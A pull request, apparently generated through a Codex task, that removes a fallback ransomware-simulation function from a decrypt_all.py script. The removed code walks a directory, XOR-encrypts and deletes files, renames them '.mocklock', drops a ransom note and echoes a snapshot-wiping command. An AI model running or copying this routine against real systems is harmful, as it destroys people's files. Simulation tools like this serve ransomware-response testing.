### PR TITLE
Fix _ransom_sim reference in decrypt_all.py

### DIFF
--- a/decrypt_all.py
+++ b/decrypt_all.py
@@ -70,49 +70,6 @@ if _restore_sim is None:
                 except Exception:
                     pass
 
-if _ransom_sim is None:
-    def _ransom_sim(target_dir: Path, threads: int = 8) -> None:
-        """Fallback ransomware simulation if module import fails."""
-        NOTE_TEXT = (
-            "Your files have been encrypted by MockBit-Test.\n"
-            "This is ONLY a test. No real ransom. Key = AA.\n"
-        )
-        _KEY = 0xAA
-
-        def _xor_bytes(data: bytes) -> bytes:
-            return bytes(b ^ _KEY for b in data)
-
-        def _process_file(file_path: Path) -> None:
-            try:
-                with open(file_path, "rb") as f:
-                    data = f.read()
-                enc = _xor_bytes(data)
-                tmp_fd, tmp_name = tempfile.mkstemp(dir=str(file_path.parent))
-                with os.fdopen(tmp_fd, "wb") as tmp:
-                    tmp.write(enc)
-                    tmp.flush()
-                    os.fsync(tmp.fileno())
-                out = file_path.with_suffix(file_path.suffix + ".mocklock")
-                os.replace(tmp_name, out)
-                os.unlink(file_path)
-            except Exception:
-                pass
-
-        with ThreadPoolExecutor(max_workers=threads) as exe:
-            for dirpath, _, files in os.walk(target_dir):
-                root = Path(dirpath)
-                for name in files:
-                    fp = root / name
-                    if not fp.is_file() or fp.is_symlink():
-                        continue
-                    exe.submit(_process_file, fp)
-                note = root / "README_MOCKBIT_RESTORE.txt"
-                try:
-                    with open(note, "w") as f:
-                        f.write(NOTE_TEXT)
-                except Exception:
-                    pass
-        subprocess.run(["/bin/echo", "simulate rm -rf /home/*/.snapshots"])
 
 # Default options
 START_PATH = "folder"


### PR DESCRIPTION
## Summary
- remove leftover `_ransom_sim` fallback from `decrypt_all.py`

## Testing
- `pytest -q`

------
https://chatgpt.com/codex/tasks/task_e_6851727429a08332a8574689599a7f6b